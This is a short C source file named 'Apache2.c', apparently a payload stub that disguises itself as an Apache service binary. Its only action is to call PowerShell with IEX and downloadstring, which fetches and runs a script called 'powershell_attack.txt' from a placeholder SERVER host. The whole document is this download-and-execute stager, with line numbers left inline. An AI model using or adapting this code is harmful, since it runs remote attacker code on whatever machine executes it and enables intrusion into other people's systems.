1/* Apache2.c */ 2#include<stdio.h> 3main() 4{ 5system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://SERVER/powershell_attack.txt '))\""); 6return 0; 7} 8 9